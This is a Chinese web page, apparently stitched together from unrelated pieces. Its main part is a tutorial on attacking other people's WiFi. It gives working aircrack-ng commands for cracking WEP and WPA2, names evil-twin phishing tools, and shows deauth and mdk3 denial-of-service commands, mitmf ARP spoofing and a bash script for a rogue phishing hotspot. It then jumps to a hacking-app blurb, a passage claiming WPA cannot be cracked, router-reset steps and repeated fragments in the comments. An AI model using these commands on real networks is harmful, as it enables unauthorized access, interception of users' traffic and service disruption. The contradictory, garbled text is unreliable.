目录介绍:
怎么攻击别人wifi?
1.保密性
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI没有采取认证加密措施,任意用户均可链接WIFI,用户数据在BSS(基本服务集)中明文传输,恶意用户没有任何门槛就可连接,然后通过中间人攻击即可获取用户的数据(SSL、SSH等需要其他工具)。如下图所示:
WEP、WPA、WPA2认证加密模式的WIFI需要破解获取密码,然后通过中间人或直接嗅探的方式获取用户明文数据。步骤就不详述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕获ivs数据包
aireplay-ng -3 -b 目标AP的MAC -h 某一个连接该AP的station的MAC wlan1mon #发送ARP包获取加速获取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目标AP的MAC -c AP所在chanle wlan1mon #嗅探无线数据,抓取handshake包
aireplay-ng -0 5 -a 目标AP的MAC -c 某一连接AP的station的MAC wlan1mon #发送deauth包,更快的获取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密码
密码破解成功后即可连接AP,通过中间人的方式获取用户明文数据,或者直接用wireshark抓取加密包,然后通过airdecap-ng工具解密,然后用wireshark读取已经解密的数据包。
破解WPA、WPA2不一定成功,取决于你字典是否强大,此时我们可以想办法诱骗用户主动输入WIFI密码,比如我们创建一个和目标AP具有同样ESSID的软AP,用户可以连接上,单在浏览网页时会弹出一个虚假的认证页面,告诉用户必须输入WIFI的密码,用户只要输入密码我们即可获取。可以利用fluxion、wifiphisher等工具实现。
wifiphisher将用户输入的密码当做WIFI的密码,但此密码并没有去验证,如果用户输入错误,也会提示出该密码。
而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。
2.可用性
通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。
aireplay -0 100 -a 目标AP的MAC -c攻击的station的MAC wlan1mon #发送大量的deauth包,迫使目标station无法连接AP
mdk3 wlan1mon a -a 攻击AP的MAC #mdk3可以伪造大量的station与AP连接,从而耗尽AP的资源造成DOS攻击
3.真实性
(1)恶意用户进入无线系统后,可通过中间人攻击获取或修改用户数据。
ARP欺骗或DNS欺骗,ettercap工具非常方便。下面采用mitmf工具通过ARP欺骗将目标浏览网页中的所有图片上下颠倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通过driftnet工具抓取目标浏览网页时的图片
driftnet -i wlan0
当然还可以利用中间人攻击做很多事情,比如获取cookie,嵌入js,结合beef进一步攻击等等。。。
(2)伪造AP进行钓鱼攻击
airbase -ng -e airmon wlan1mon #创建钓鱼热点
然后通过下面的脚本开启dhcp服务器(必须先安装isc-dhcp-server),开启路由,开启系统转发,开启防火墙nat等。
1 #!/bin/bash 2 3 echo '配置钓鱼热点...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待启动dhcp服务器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此时用户可以不用密码即可连接airmon热点,并可以上网,但此时可以通过嗅探at0网卡获取用户数据。
4.完整性
篡改用户数据,在WIFI攻击这块貌似用处不大。
5.不可抵赖性
Wifi hacker软件怎么用
【软件介绍】
◆ 软件简介
◆ 这是目前最先进的无线黑客的Android应用程序允许你在你附近的任何无线网络破解无线网络密钥。例如,如果你已经忘记了你自己的路由器的网络密钥,你可以使用这个应用程序来检索它。
◆ 支持多种加密类型,包括WEP,WPA和WPA2。
◆ 需要root权限。
【安装说明】
◆ 卸载源文件安装, 安装过本人汉化的前一个版本的朋友可以覆盖安装
这样就可以连WiFi自由上网了!
黑客WiFi万能钥匙
破解IFI密码
事实总是残酷的,不过只能告诉你真相。
1、以现有的技术手段,是没有办法破解WPA的加密方式(现在基本上全部WIFI的加密方式),WPA的加密方式安全性很高,根本就破不了。
2、即使破解密码,人家也有可能设置了MAC地址过滤,你还是上不去。
3、网上的所谓破解密码软件,全部都是骗人的,要么浪费你的流量,要么根本就是木马,要小心下载使用。
4、可以下个WIFI万能钥匙,但那个软件只是能上别人分享过的热点,如果热点没被分享过,根本就上不了。
5、也可破解些简单的数字密码。比如12345678之类的密码。
wifi被黑客侵入了怎么处理
感觉自己的wifi不安全,建议及时将路由器进行复位重新设置参数。
1、将网线—路由器—电脑之间的线路连接好,启动电脑和路由器设备;
2、启动设备后,打开浏览器,在地址栏中输入192.168.1.1进入无线路由器设置界面。(如进不了请翻看路由器底部铭牌或者是路由器使用说明书,不同型号路由器设置的默认都不一样。)
3、设置界面出现一个登录路由器的帐号及密码,输入默认帐号和密码admin,也可以参考说明书;
4、登录成功之后选择设置向导的界面,默认情况下会自动弹出;
5、选择设置向导之后会弹出一个窗口说明,通过向导可以设置路由器的基本参数,直接点击下一步即可;
6、根据设置向导一步一步设置,选择上网方式,通常ADSL用户则选择第一项PPPoE,如果用的是其他的网络服务商则根据实际情况选择下面两项,如果不知道该怎么选择的话,直接选择第一项自动选择即可,方便新手操作,选完点击下一步;
7、输入从网络服务商申请到的账号和密码,输入完成后直接下一步;
8、设置wifi密码,尽量字母数字组合比较复杂一点不容易被蹭网。
9、输入正确后会提示是否重启路由器,选择是确认重启路由器,重新启动路由器后即可正常上网。
黑客是用什么方式盗取wifi密码的
能截取数据 然后用软件分析数据,如果你的数据包里面正好有这个密码,如果密码设置的纯8位数字,容易破解。
所以建议大家的路由密码都用数字+字母+位数不确定,这样就不容易被别人破解了。
网友评论
最新评论
组合比较复杂一点不容易被蹭网。9、输入正确后会提示是否重启路由器,选择是确认重启路由器,重新启动路由器后即可正常上网。黑客是用什么方式盗取wifi密码的能截取数据 然后用软件分析数据,如果你的数据包里面正好有这个密码,如果密码设置的纯8位数字,容易破解。所以建议大家的路由密码都用数字+
该密码。而fluxion会将用户输入的密码与handshake校验,成功方认为获取到密码。2.可用性通过使目标用户无法使用WIFI来破坏无线系统的可用性,通常通过DOS攻击来实现,比如发送大量的deauth包来迫使用户station与AP解除认证、连接。aireplay